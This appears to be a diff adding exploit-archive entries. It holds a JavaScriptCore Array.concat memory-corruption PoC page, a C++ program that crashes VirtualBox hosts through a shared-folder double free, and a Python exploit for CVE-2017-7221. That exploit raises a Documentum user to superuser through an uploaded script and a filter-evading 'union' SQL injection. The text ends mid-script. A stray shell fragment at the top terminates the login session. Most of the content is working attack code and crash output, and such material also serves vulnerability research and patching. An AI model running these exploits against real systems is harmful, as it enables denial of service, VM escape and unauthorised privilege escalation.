 /bin/sleep 15s
 /bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/
 head -1 | /usr/bin/awk '{ print $1 }'`
--- a/platforms/multiple/dos/41931.html
+++ b/platforms/multiple/dos/41931.html
@ -0,0 +1,67 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1095
 There is an out-of-bounds memcpy in Array.concat that can lead to memory corruption.
 In builtins/ArrayPrototype.js, the function concatSlowPath calls a native method @appendMemcpy with a parameter resultIndex that is handled unsafely by the method. It calls JSArray::appendMemcpy, which calculates the memory size for the combined arrays as follows:
 unsigned newLength = startIndex + otherLength;
 If startIndex (resultIndex from concatSlowPath in JS) is very large, an integer overflow can occur, causing too small a buffer to be allocated, and copying to occur outside of the buffer.
 It should be difficult to reach this state without a long execution time, because an array of length resultIndex needs to be allocated and copied before resultIndex is incremented, however if both arrays involved in the concatenation are of type ArrayWithUndecided JSArray::appendMemcpy returns true without copying, and resultIndex can be incremented with a low execution time.
 Arrays of type ArrayWithUndecided are usually of length 0, however, it is possible to create one by calling Array.splice on an array with all undefined elements. This will cause an undefined Array of the delete length to be allocated, and then returned without it being written to, which would cause it to decide its type.
 A minimal PoC is as follows, and a full PoC is attached.
 var a = [];
 a.length = 0xffffff00;
 var b = a.splice(0, 0x100000); // Undecided array
 var args = [];
 args.length = 4094;
 args.fill(b);
 var q = [];
 q.length = 0x1000;
 q.fill(7);
 var c = a.splice(0, 0xfffef); //Shorter undecided array
 args[4094] = c;
 args[4095] = q;
 b.concat.apply(b, args);
 -->
 <html>
 <body>
 <script>
 var a = [];
 a.length = 0xffffff00;
 var b = a.splice(0, 0x100000); // Undecided array
 var args = [];
 args.length = 4094;
 args.fill(b);
 var q = [];
 q.length = 0x1000;
 q.fill(7);
 var c = a.splice(0, 0xfffef); //Shorter undecided array
 args[4094] = c;
 args[4095] = q;
 b.concat.apply(b, args);
 </script>
 </body>
 </html>
--- a/platforms/multiple/dos/41932.cpp
+++ b/platforms/multiple/dos/41932.cpp
@ -0,0 +1,198 @@
 /*
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227
 We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.
 We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.
 It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).
 If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:
 >VirtualBoxKiller.exe E:\
 Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:
 --- cut ---
  3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
  1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
 --- cut ---
 The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:
 --- cut ---
  1: kd> g
  Critical error detected c0000374
  Break instruction exception - code 80000003 (first chance)
  ntdll!RtlReportCriticalFailure+0x2f:
  0033:00000000`76f3f22f cc              int     3
  1: kd> kb
  RetAddr           : Args to Child                                                           : Call Site
  00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
  00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
  00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
  00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
  00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
  00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
  000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
  000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
  000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
  000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
  000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
  000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
  000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
  00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
  00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
  00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
  00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
  00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
 --- cut ---
 When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:
 --- cut ---
  1: kd> g
  =======================================
  VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed. 
    000000000DCB1000 : Heap handle for the heap owning the block.
    000000001C37E000 : Heap block being freed again.
    0000000000000000 : Size of the heap block.
    0000000000000000 : Not used
  =======================================
  This verifier stop is not continuable. Process will be terminated 
  when you use the `go' debugger command.
  =======================================
  1: kd> kb
  RetAddr           : Args to Child                                                           : Call Site
  000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
  000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
  000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
  000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
  000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
  000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
  000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
  00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
  00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
  00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
  00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
  000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
  000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
  000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
  000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
  000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
  000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
  000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
  00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
  00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
  00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
  00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
  00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
 --- cut ---
 Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue.
 References:
 [1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
 */
 #include <Windows.h>
 #include <winternl.h>
 #include <cstdio>
 #include <time.h>
 extern "C"
 NTSTATUS WINAPI NtQueryDirectoryFile(
  _In_     HANDLE                 FileHandle,
  _In_opt_ HANDLE                 Event,
  _In_opt_ PIO_APC_ROUTINE        ApcRoutine,
  _In_opt_ PVOID                  ApcContext,
  _Out_    PIO_STATUS_BLOCK       IoStatusBlock,
  _Out_    PVOID                  FileInformation,
  _In_     ULONG                  Length,
  _In_     FILE_INFORMATION_CLASS FileInformationClass,
  _In_     BOOLEAN                ReturnSingleEntry,
  _In_opt_ PUNICODE_STRING        FileName,
  _In_     BOOLEAN                RestartScan
 );
 typedef struct _FILE_DIRECTORY_INFORMATION {
  ULONG         NextEntryOffset;
  ULONG         FileIndex;
  LARGE_INTEGER CreationTime;
  LARGE_INTEGER LastAccessTime;
  LARGE_INTEGER LastWriteTime;
  LARGE_INTEGER ChangeTime;
  LARGE_INTEGER EndOfFile;
  LARGE_INTEGER AllocationSize;
  ULONG         FileAttributes;
  ULONG         FileNameLength;
  WCHAR         FileName[1];
 } FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
 int main(int argc, char **argv) {
  // Validate command line format.
  if (argc != 2) {
    printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
    return 1;
  }
  // Initialize the PRNG.
  srand((unsigned int)time(NULL));
  // Create a subdirectory dedicated to demonstrating the vulnerability.
  CHAR TmpDirectoryName[MAX_PATH];
  _snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);
  if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
    printf("CreateDirectory failed, %d\n", GetLastError());
    return 1;
  }
  // Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
  CONST UINT kTempFilesCount = 16;
  CONST UINT kTempFilenameLength = 128;
  CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];
  memset(TmpFilename, 'A', kTempFilenameLength);
  TmpFilename[kTempFilenameLength] = '\0';
  for (UINT i = 0; i < kTempFilesCount; i++) {
    _snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
    HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
      printf("CreateFile#1 failed, %d\n", GetLastError());
      return 1;
    }
    CloseHandle(hFile);
  }
  // Open the temporary directory.
  HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
  if (hDirectory == INVALID_HANDLE_VALUE) {
    printf("CreateFile#2 failed, %d\n", GetLastError());
    return 1;
  }
  IO_STATUS_BLOCK iosb;
  FILE_DIRECTORY_INFORMATION fdi;
  // Perform the first call, with ReturnSingleEntry set to FALSE.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);
  // Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);
  // We should never reach here.
  CloseHandle(hDirectory);
  return 0;
 }
--- a/platforms/multiple/webapps/41927.txt
+++ b/platforms/multiple/webapps/41927.txt
--- a/platforms/multiple/webapps/41928.py
+++ b/platforms/multiple/webapps/41928.py
@ -0,0 +1,598 @@
 '''
 CVE Identifier: CVE-2017-7221
 Vendor: OpenText
 Affected products: OpenText Documentum Content Server (all versions)
 Researcher: Andrey B. Panfilov
 Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
 Fix: not available
 PoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44
 Description: 
 all versions of Documentum Content Server contain dm_bp_transition docbase 
 method ("stored procedure”) which is written on basic, implementation of this docbase 
 methods does not properly validate user input which allows attacker to execute arbitrary 
 code with superuser privileges.
 Related code snippet is:
 ==========================================8<========================================
 'Evaluate the user-defined entry criteria
 If (result = True And run_entry = "T") Then
 If (debug = True) Then
 PrintToLog sess, "Run user defined entry criteria."
 End If
 '
 ' researcher comment:
 ' userEntryID parameter is controlled by attacker
 '
 result = RunProcedure(userEntryID, 1, sess, sysID,_
 user_name, targetState)
 End If
 ...
 '
 ' researcher comment:
 ' procID parameter is controlled by attacker
 '
 Function RunProcedure(procID As String, procNo As Integer,_
 sessID As String, objID As String, userName As String,_
 targetState As String) As Boolean
 ...
 StartIt:
 If (procID <> "0000000000000000") Then
 result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
 '
 ' researcher comment:
 ' here basic interpreter loads content of user-provided script
 ' from underlying repostiory using following technique:
 ' 
 ' checking that it is dealing with dm_procedure object
 ' (check was introduced in CVE-2014-2513):
 ' id,c,dm_procedure where r_object_id='procID'
 ' 
 ' getting content of basic script
 ' fetch,c,procID
 ' getpath,c,l
 '
 result = external(procID)
 If (result = True) Then
 If (procNo = 1) Then
 ' --- Running user-defined entry criteria ---
 result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
 On Error Goto NoFunction
 '
 ' researcher comment
 ' here dmbasic interpreter executes user defined function
 '
 result = EntryCriteria(sessID, objID, userName,_
 targetState, errorStack)
 If (result = False) Then
 errorStack = "[ErrorCode] 1500 [ServerError] " + _
 errorStack
 End If
 ==========================================>8========================================
 So, attacker is able to create it’s own basic procedure in repository and pass it’s identifier
 as argument for dm_bp_transition procedure:
 ==========================================8<========================================
 $ cat /tmp/test
 cat: /tmp/test: No such file or directory
 $ cat > test.ebs
 Public Function EntryCriteria(ByVal SessionId As String,_
 ByVal ObjectId As String,_
 ByVal UserName As String,_
 ByVal TargetState As String,_
 ByRef ErrorString As String) As Boolean
 t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
 EntryCriteria=True
 End Function
 $ iapi
 Please enter a docbase name (docubase): repo
 Please enter a user (dmadmin): unprivileged_user
 Please enter password for unprivileged_user:
 EMC Documentum iapi - Interactive API interface
 (c) Copyright EMC Corp., 1992 - 2011
 All rights reserved.
 Client Library Release 6.7.1000.0027
 Connecting to Server using docbase repo
 [DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
 started for user unprivileged_user."
 Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
 Session id is s0
 API> create,c,dm_procedure
 ...
 0801d920804e5416
 API> set,c,l,object_name
 SET> test
 ...
 OK
 API> setfile,c,l,test.ebs,crtext
 ...
 OK
 API> save,c,l
 ...
 OK
 API> ?,c,execute do_method with method='dm_bp_transition',
 arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
 0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
 (1 row affected)
 API> Bye
 $ cat /tmp/test
 dm_bp_transition_has_vulnerability
 ==========================================>8========================================
 Vendor was been notified about this vulnerability on November 2013 using customer 
 support channel, after a while vendor started claiming that this vulnerability 
 was remediated, though no CVE was announced. Moreover, the fix was contested
 and CERT/CC started tracking this vulnerability, the PoC provided
 to CERT/CC was:
 ==========================================8<========================================
 Vendor have decided that the root cause of problem is users are able to
 create dm_procedure objects, and now in Documentum Content Server
 v6.7SP1P26 we have following behavior:
 [DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
 user unprivileged_user."
 Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
 Session id is s0
 API> create,c,dm_procedure
 ...
 0801d920805929d0
 API> set,c,l,object_name
 SET> test
 ...
 OK
 API> setfile,c,l,test.ebs,crtext
 ...
 OK
 API> save,c,l
 ...
 [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
 (unprivileged_user) needs to have superuser or sysadmin privilege."
 BUT:
 API> create,c,dm_document
 ...
 0901d920805929dd
 API> set,c,l,object_name
 SET> test
 ...
 OK
 API> setfile,c,l,test.ebs,crtext
 ...
 OK
 API> save,c,l
 ...
 OK
 API> ?,c,execute do_method with
 method='dm_bp_transition',arguments='repo repo dmadmin ""
 0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
 dmadmin 0000000000000000'
 (1 row affected)
 ....
 API> Bye
 ~]$ cat /tmp/test
 dm_bp_transition_has_vulnerability
 ~]$
 ==========================================>8========================================
 On July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.
 On November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor 
 constantly fails to provide status of reported vulnerabilities) by providing another proof of concept, 
 description provided to CERT/CC was:
 ==========================================8<========================================
 I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following
 error:
 [ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
 error: [DM_API_W_NO_MATCH]warning: "There was no match in the
 docbase for the qualification: dm_procedure where r_object_id =
 '0801fd08805c9dfe'"
 Such behaviour means that EMC tried to remediate a security issue by
 "checking" object type of supplied object:
 Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
 Session id is s0
 API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
 ...
 [DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the
 qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"
 API> Bye
 bin]$ strings dmbasic| grep dm_procedure
 id,%s,dm_procedure where object_name = '%s' and folder('%s')
 id,%s,dm_procedure where r_object_id = '%s'
 # old version of dmbasic binary
 bin]$ strings dmbasic| grep dm_procedure
 bin]$
 So, the fix was implemented in dmbasic binary, the problem is neither 6.7
 SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
 that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
 issue is still reproducible because introduced check could be bypassed
 using SQL injection:
 ~]$ cat test.ebs
 Public Function EntryCriteria(ByVal SessionId As String,_
 ByVal ObjectId As String,_
 ByVal UserName As String,_
 ByVal TargetState As String,_
 ByRef ErrorString As String) As Boolean
 t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
 EntryCriteria=True
 End Function
 ~]$ cat /tmp/test
 cat: /tmp/test: No such file or directory
 ~]$ iapi
 Please enter a docbase name (docubase): repo
 Please enter a user (dmadmin): test01
 Please enter password for test01:
 EMC Documentum iapi - Interactive API interface
 (c) Copyright EMC Corp., 1992 - 2011
 All rights reserved.
 Client Library Release 6.7.2190.0142
 Connecting to Server using docbase repo
 [DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for
 user test01."
 Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
 Session id is s0
 API> create,c,dm_sysobject
 ...
 0801fd08805c9dfe
 API> set,c,l,object_name
 SET> test
 ...
 OK
 API> setfile,c,l,test.ebs,crtext
 ...
 OK
 API> save,c,l
 ...
 OK
 API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
 repo repo dmadmin "" 0000000000000000 0000000000000000
 0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
 from dm_sysobject where r_object_id=''0801fd08805c9dfe"
 0000000000000000 0000000000000000 0000000000000000 ""
 0 0 T F T T dmadmin 0000000000000000'
 ...
 (1 row affected)
 API> Bye
 ~]$ cat /tmp/test
 dm_bp_transition_has_vulnerability
 ~]$
 Here "union ..." allows to bypass check based on "id" call:
 Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
 Session id is s0
 API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
 select r_object_id from dm_sysobject where
 r_object_id='0801fd08805c9dfe'
 ...
 0801fd08805c9dfe
 API> apply,c,,GET_LAST_SQL
 ...
 q0
 API> next,c,q0
 ...
 OK
 API> get,c,q0,result
 ...
 select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where
 ((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
 (dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
 union select all dm_sysobject.r_object_id from dm_sysobject_sp
 dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
 and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)
 API> close,c,q0
 ...
 OK
 Comma is required to bypass error in fetch call:
 API> fetch,c,0801fd08805c9dfe' union select r_object_id from
 dm_sysobject where r_object_id='0801fd08805c9dfe
 ...
 [DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union
 select r_object_id from dm_sysobject where r_object_id=
 '0801fd08805c9dfe"
 API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
 dm_sysobject where r_object_id='0801fd08805c9dfe
 ...
 OK
 ==========================================>8========================================
 On August 2015 vendor had undertaken another attempt to remediate this vulnerability
 check ESA-2015-131/CVE-2015-4533 for details.
 On August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110
 for detailed description - I just demonstrated another attack vector - using 
 UNION ALL keyword instead of UNION:
 =================================8<================================
 API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
 repo repo dmadmin "" 0000000000000000 0000000000000000
 0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
 from dm_sysobject where r_object_id=''0801fd08805c9dfe"
 0000000000000000 0000000000000000 0000000000000000 ""
 0 0 T F T T dmadmin 0000000000000000'
 [DM_METHOD_E_METHOD_ARGS_INVALID]error:
 "The arguments being passed to the method 'dm_bp_transition' are
 invalid:
 arguments contain sql keywords which are not allowed."
 New attack vector (note ALL keyword):
 API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
 repo repo dmadmin "" 0000000000000000 0000000000000000
 0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
 from dm_sysobject where r_object_id=''0801fd08805c9dfe"
 0000000000000000 0000000000000000 0000000000000000 ""
 0 0 T F T T dmadmin 0000000000000000'
 =================================>8================================
 Recently I have noticed that latest versions of Documentum Content
 Server are not affected by the PoC provided above, however all versions
 of Documentum Content Server are still vulnerable because vendor incorrectly
 implemented input validation: they convert arguments to lower/upper-case, 
 replace line feed, carriage return and tab characters by a space, 
 remove double spaces, after that they check where resulting string contains 
 special keywords ('union ' and 'union all') or not - it is possible 
 to use other whitespace characters like backspace, which is demonstrated
 in the PoC.      
 __
 Regards,
 Andrey B. Panfilov
 CVE-2017-7221.py
 '''
 #!/usr/bin/env python
 import socket
 import sys
 from os.path import basename
 from dctmpy.docbaseclient import DocbaseClient
 from dctmpy.obj.typedobject import TypedObject
 CIPHERS = "ALL:aNULL:!eNULL"
 def usage():
    print "usage:\n\t%s host port user password" % basename(sys.argv[0])
 def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)
    (session, docbase) = create_session(*sys.argv[1:5])
    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)
    install_owner = session.serverconfig['r_install_owner']
    document_id = session.next_id(0x08)
    content_id = session.next_id(0x06)
    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")
    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        exit(1)
    data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
           "\nByVal ObjectId As String,_" \
           "\nByVal UserName As String,_" \
           "\nByVal TargetState As String,_" \
           "\nByRef ErrorString As String) As Boolean" \
           "\nDim QueryID As String" \
           "\nDim Query As String" \
           "\nQuery = \"query,c,update dm_user objects set " \
           "user_privileges=16 where user_name=\'%s\'\"" \
           "\nQueryID = dmAPIGet(Query)" \
           "\nQueryID = dmAPIExec(\"commit,c\")" \
           "\nEntryCriteria=True" \
           "\nEnd Function" % (sys.argv[3])
    b = bytearray()
    b.extend(data)
    if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
        print "Failed to start push"
        exit(1)
    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']
    procedure = False
    try:
        print "Trying to create dm_procedure"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_procedure")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2014-2513")
        document.set_string("r_object_type", "dm_procedure")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if session.sys_obj_save(document_id, document):
            procedure = True
    except Exception, e:
        print str(e)
    if not procedure:
        print "Failed to create dm_procedure"
        print "Trying to create dm_sysobject"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_sysobject")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_string("owner_name", sys.argv[3])
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2017-7221")
        document.set_string("r_object_type", "dm_sysobject")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if not session.sys_obj_save(document_id, document):
            print "Failed to create dm_sysobject"
            exit(1)
    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_id("parent_id", document_id)
    content.set_int("page", 0)
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    if not session.save_cont_attrs(content_id, content):
        print "Failed to create content"
        exit(1)
    if procedure:
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s\" " \
                "0000000000000000  0000000000000000 0000000000000000 " \
                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 install_owner, session.session)
    else:
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s,'' " \
                "union\b select r_object_id from  dm_sysobject(all) where r_object_id=''%s\" " \
                "0000000000000000  0000000000000000 0000000000000000 " \
